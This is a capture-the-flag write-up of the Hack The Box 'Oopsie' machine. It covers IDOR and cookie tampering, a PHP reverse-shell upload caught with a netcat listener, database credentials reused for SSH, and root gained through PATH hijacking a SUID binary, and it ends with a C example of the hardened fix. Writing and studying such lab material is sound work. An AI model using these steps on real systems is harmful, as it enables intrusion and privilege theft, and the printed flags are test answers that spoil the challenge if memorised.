Oopsie
Keywords: #cookie_manipulation, #IDOR, #web_spider, #web_app_hacking, #path_hijacking, #SUID, #directory_traversal, #file_upload
Date pwned: 2024-10-31
Nmap scan report for 10.129.14.132
Host is up (0.050s latency).
Not shown: 64950 closed tcp ports (reset), 583 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory traversal
gobuster dir -u http://10.129.241.77 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.241.77
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/css (Status: 301) [Size: 312] [--> http://10.129.241.77/css/]
/fonts (Status: 301) [Size: 314] [--> http://10.129.241.77/fonts/]
/images (Status: 301) [Size: 315] [--> http://10.129.241.77/images/]
/index.php (Status: 200) [Size: 10932]
/js (Status: 301) [Size: 311] [--> http://10.129.241.77/js/]
/server-status (Status: 403) [Size: 278]
/themes (Status: 301) [Size: 315] [--> http://10.129.241.77/themes/]
/uploads (Status: 301) [Size: 316] [--> http://10.129.241.77/uploads/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
OWASP ZAP Spider Results
- Login Page - http://10.129.121.239/cdn-cgi/login/
Access ID: 2233
Name: guest
Email: guest@megacorp.com
Get admin's ID through IDOR - 34322
http://10.129.244.186/cdn-cgi/login/admin.php?content=accounts&id=2
TO
http://10.129.244.186/cdn-cgi/login/admin.php?content=accounts&id=1
Change the user value in the cookie to 34322 = got upload privileges
Upload request
Host: 10.129.244.186
Content-Length: 165516
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.129.244.186
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvNqgcct1zMDcq2N8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.59 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.244.186/cdn-cgi/login/admin.php?content=uploads
Accept-Encoding: gzip, deflate, br
Cookie: role=guest; user=34322
Connection: keep-alive
------WebKitFormBoundaryvNqgcct1zMDcq2N8
Content-Disposition: form-data; name="name"
abcs
------WebKitFormBoundaryvNqgcct1zMDcq2N8
Content-Disposition: form-data; name="fileToUpload"; filename="Hadestown_musical_poster.png"
Content-Type: image/png
‰PNG
From the gobuster output we know the upload directory is:
http://10.129.244.186/uploads/
However, requesting the directory itself returns 403 Forbidden.
Since the site runs PHP, try uploading php-reverse-shell.php to the server.
Set up a netcat listener for the reverse shell:
sudo nc -lvnp 443
Trigger the reverse shell by requesting the uploaded file:
http://10.129.244.186/uploads/php-reverse-shell.php
Got reverse shell on listening side
/home/robert
user.txt -> f2c74ee8db7983851ab2a96a44eb7981
/var/www/html/cdn-cgi/login
db.php -> db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
Logging in to the website with these credentials doesn't work.
Log in over SSH with these credentials instead:
ssh robert@10.129.244.186
Success.
SUID and SGID Misconfiguration
When a binary with the SUID permission is run, it runs as another user, and therefore with that user's privileges. It could be root, or just another user. If the SUID bit is set on a program that can spawn a shell or can be abused in some other way, we can use that to escalate our privileges.
According to the hint, run this command
find / -group bugtracker 2>/dev/null
This lists, starting from the root directory, every file whose group is bugtracker (errors are discarded).
robert@oopsie:/$ ls -la /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
So bugtracker is owned by root, and members of the bugtracker group may execute it.
The s in '-rwsr' means SUID (set-user-ID).
It means that every time this file is run, it is executed as the file's owner, root in this case, rather than as the user who ran it.
robert@oopsie:/$ /usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 9
---------------
cat: /root/reports/9: No such file or directory
The program runs cat, which indicates something exploitable: if cat is invoked by its bare name rather than an absolute path, it is looked up through PATH.
The idea is to trick the system into running a /bin/sh shell as root instead of the real cat program, which would give us root access.
To do that, we need a file called "cat" whose content is the command that starts a shell.
echo /bin/sh > cat
robert@oopsie:/$ echo /bin/sh > cat
-bash: cat: Permission denied
We can't write there, but /tmp is writable by every user, so cd to /tmp.
robert@oopsie:/tmp$ echo /bin/sh > cat
robert@oopsie:/tmp$ ls
cat
Make cat executable
chmod +x cat
In order to have bugtracker execute our malicious cat instead of the normal one, we need to change the PATH variable, which defines which directories are searched, in order, when a command is run by name.
export PATH=/tmp:$PATH
robert@oopsie:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
Then run bugtracker; when it tries to run cat, it should find our malicious cat first, which will give us a shell.
robert@oopsie:/tmp$ /usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 2
---------------
# whoami
root
Flag: af13b0bee69f8a877c3faf667f7beacf
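To show the bug class behind the PATH hijack above, here is an added C illustration written for these notes (not the bugtracker binary's actual source): the hijackable pattern, where a shell resolves a bare "cat" through the caller's PATH, beside a hardened version that validates the ID, execs /bin/cat by absolute path and passes a fixed environment. The report directory is taken from the cat error message above; the use of system() is an assumption.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define REPORT_DIR "/root/reports/"   /* path seen in the binary's cat error */

/* Vulnerable shape (assumed, not the box's source): the command goes through
 * a shell, which resolves the bare "cat" via the caller's PATH, so a writable
 * directory prepended to PATH (e.g. /tmp) wins and runs with root privilege. */
int show_report_vulnerable(const char *id) {
    char cmd[256];
    snprintf(cmd, sizeof cmd, "cat " REPORT_DIR "%s", id);
    return system(cmd);
}

/* Accept only 1..16 ASCII digits so the id cannot inject "..", "/" or shell
 * metacharacters into the report path. Returns 1 if acceptable, else 0. */
int valid_report_id(const char *id) {
    size_t n = strlen(id);
    if (n == 0 || n > 16) return 0;
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)id[i])) return 0;
    return 1;
}

/* Hardened: no shell, absolute path to cat, and a fixed environment handed to
 * execve so nothing the caller exported (PATH, LD_PRELOAD, ...) is consulted.
 * Returns -1 on rejected input or fork/wait failure, else cat's exit status. */
int show_report_hardened(const char *id) {
    if (!valid_report_id(id)) return -1;
    char path[256];
    snprintf(path, sizeof path, REPORT_DIR "%s", id);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *argv[] = { "/bin/cat", path, NULL };
        char *envp[] = { "PATH=/usr/bin:/bin", NULL };
        execve("/bin/cat", argv, envp);
        _exit(127);   /* only reached if exec itself failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With the hardened form, prepending /tmp to PATH changes nothing because the child never consults the caller's PATH, and an ID such as "9; id" is rejected before any process is spawned.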